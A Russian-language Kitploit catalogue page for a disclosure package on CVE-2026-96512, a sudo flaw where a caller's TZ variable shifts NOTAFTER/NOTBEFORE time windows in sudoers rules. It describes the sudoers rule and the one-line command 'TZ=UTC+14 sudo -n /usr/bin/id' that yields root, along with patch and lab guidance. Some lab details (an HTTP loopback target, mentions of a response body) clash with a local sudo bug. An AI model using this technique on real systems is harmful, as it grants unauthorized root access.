Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-96512 — Пакет раскрытия и PoC для CVE-2026-96512 — обход временного окна TZ NOTBEFORE/NOTAFTER в sudo, позволяющий локальное повышение привилегий, с воспроизведением в лаборатории и рекомендациями по исправлению. | Kitploit
Инструменты/GitHubGitHub/abraxas/cve-2026-96512
Повышение привилегийАнализ уязвимостейЭксплуатацияВиртуализация для безопасностиТестирование на ПроникновениеЛаборатории и Практика
GitHubabraxas/cve-2026-96512

CVE-2026-96512

Пакет раскрытия и PoC для CVE-2026-96512 — обход временного окна TZ NOTBEFORE/NOTAFTER в sudo, позволяющий локальное повышение привилегий, с воспроизведением в лаборатории и рекомендациями по исправлению.

Репозиторий
1218 ч 1 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Abraxas Labs — CVE-2026-96512

abraxaslabs.tech  ·  github.com/abraxas  ·  @abraxas_null  ·  CVE-2026-96512

CVE-2026-96512

sudo 1.9.13p3 (Debian bookworm) — Sudo Project

В sudo обнаружена уязвимость. Когда правила sudoers используют ограничения доступа по времени NOTBEFORE или NOTAFTER с временными метками, в которых отсутствует завершающий индикатор часового пояса Z, оценка времени опирается на переменную окружения TZ, унаследованную от вызывающего пользователя.

CVECVE-2026-96512 · CVE.org
CWECWE-863
CVSSHigh: 7.8 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Продуктsudo
Затронутовсе версии вплоть до 1.9.13p3 (Debian bookworm) (включительно)
Исправленоmain commit 1820a34 (upstream-релиза пока нет) и новее
Аутентификацияаутентифицированный (см. карту исходников)
ЛицензияGNU Affero GPL v3.0
Лабораториятолько 127.0.0.1 · пакет для раскрытия вендору/клиенту, не сканер

Рекомендация (из карты исходников)

plugins/sudoers parse_gentime / gram.y timespec. Исправление sudo-project/sudo@1820a34 копирует environ из envp и выполняет unsetenv TZ.


Точка входа

  • Метод: LOCAL
  • Путь: TZ=UTC+14 sudo -n /usr/bin/id
  • Маршрутизатор: Аутентифицированная локальная политика sudoers. parse_gentime() mktime() для NOTAFTER без Z. TZ наследуется от субъекта sudoers.
  • Примечания: CVE-2026-96512 CWE-863 sudo 1.9.13p3. Свидетельство: uid=0(root) при TZ=UTC+14; без TZ доступ запрещён. Это не reverse shell. Только локальный PR:L.

Цепочка вызовов

  • sudoers: labuser ALL=(root) NOPASSWD: NOTAFTER=<now-1h no Z> /usr/bin/id
  • labuser sudo -n /usr/bin/id -> denied (expired)
  • TZ=UTC+14 sudo -n /usr/bin/id
  • parse_gentime mktime учитывает POSIX TZ=UTC+14
  • NOTAFTER epoch сдвигается на +14ч; команда разрешается с правами root

Предусловия лаборатории

  • sudo 1.8.20 — 1.9.17p2
  • правило sudoers для атакующего с NOTBEFORE или NOTAFTER и без завершающего Z

Свидетельство

Без TZ: sudo -n id запрещён. С TZ=UTC+14: uid=0(root).

Не является успехом

  • root без TZ (правило всё ещё действительно)
  • удалённый сетевой доступ
  • reverse shell

Патч / устранение

Сделайте это в первую очередь: Обновите sudo до main commit 1820a34 (upstream-релиза пока нет) или новее.

Проверка после обновления

  • Повторно запустите CVE-2026-96512-Abraxas-Labs.py против исправленной сборки: отображённое свидетельство не должно появляться.
  • Подтвердите рекомендацию вендора / набор изменений в развёрнутом дереве (см. ссылки).
  • Сигнатура WAF — это задержка, а не патч.

Если вы не можете обновиться немедленно

  • Отключите или изолируйте затронутый компонент.
  • Ищите условие-свидетельство в продакшене (новые привилегированные пользователи, неожиданные файлы, внедрённые строки — всё, что называет карта этой CVE).

Воспроизведение (авторизованная лаборатория)

Цель — только http://127.0.0.1:8088 (или loopback, который вы привязали). Не направляйте этот скрипт в интернет.

root@kitploit:~
python3 CVE-2026-96512-Abraxas-Labs.py

Успех — это свидетельство выше в теле ответа. Обычный HTML с кодом 200 — это не оно.


Образы лаборатории

Loopback-стек, использованный для воспроизведения. Официальные образы, если только Dockerfile в этой папке не собирается из исходников.

  • lab/docker-compose.yml
  • lab/Dockerfile
root@kitploit:~
cd lab
docker compose up --force-recreate

Привяжите дерево уязвимого продукта рядом с Compose, если YAML монтирует локальный каталог (zip плагина / тег исходников из таблицы версий). Публикуйте только 127.0.0.1.


Ссылки

  • CVE-2026-96512 · NVD

  • CVE-2026-96512 · CVE.org

  • access.redhat.com/security/cve/cve-2026-96512

  • http://www.openwall.com/lists/oss-security/2026/09/24/4

  • github.com/sudo-project/sudo/commit/1820a349687522f51023d1ae5925125f59679a8c

  • www.cve.org/CVERecord?id=CVE-2026-96512

  • access.redhat.com/security/cve/CVE-2026-96512

  • Abraxas Labs: abraxaslabs.tech · github.com/abraxas · @abraxas_null


Записи (структурированные)

root@kitploit:~
# CVE-2026-96512

CWE: CWE-863
CVSS: High 7.8 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (Red Hat).

## Description

sudoers `NOTBEFORE`/`NOTAFTER` timestamps without a trailing `Z` are converted with `mktime()`, which follows the caller’s `TZ`. A local user who is already named in such a rule can shift the window by up to ~25 hours (POSIX `TZ=UTC+14`) and run the allowed command outside the intended period. PAM authentication is unchanged.

## Product

sudo 1.9.13p3 on Debian bookworm (upstream 1.8.20–1.9.17p2). Fix in main `1820a34`; no upstream tarball yet at disclosure. Lab oracle is `uid=0(root)` via TZ, not a shell.

Лицензия

Этот пакет раскрытия лицензирован под GNU Affero General Public License v3.0. См. LICENSE.


Отказ от ответственности

Этот пакет предназначен для вендора, владельца сайта и лицензированных лабораторий. Скрипт обращается к 127.0.0.1. Использование его против систем, которыми вы не владеете, не авторизовано Abraxas Labs. Без гарантий.

abraxaslabs.tech · github.com/abraxas · @abraxas_null

Скачать инструмент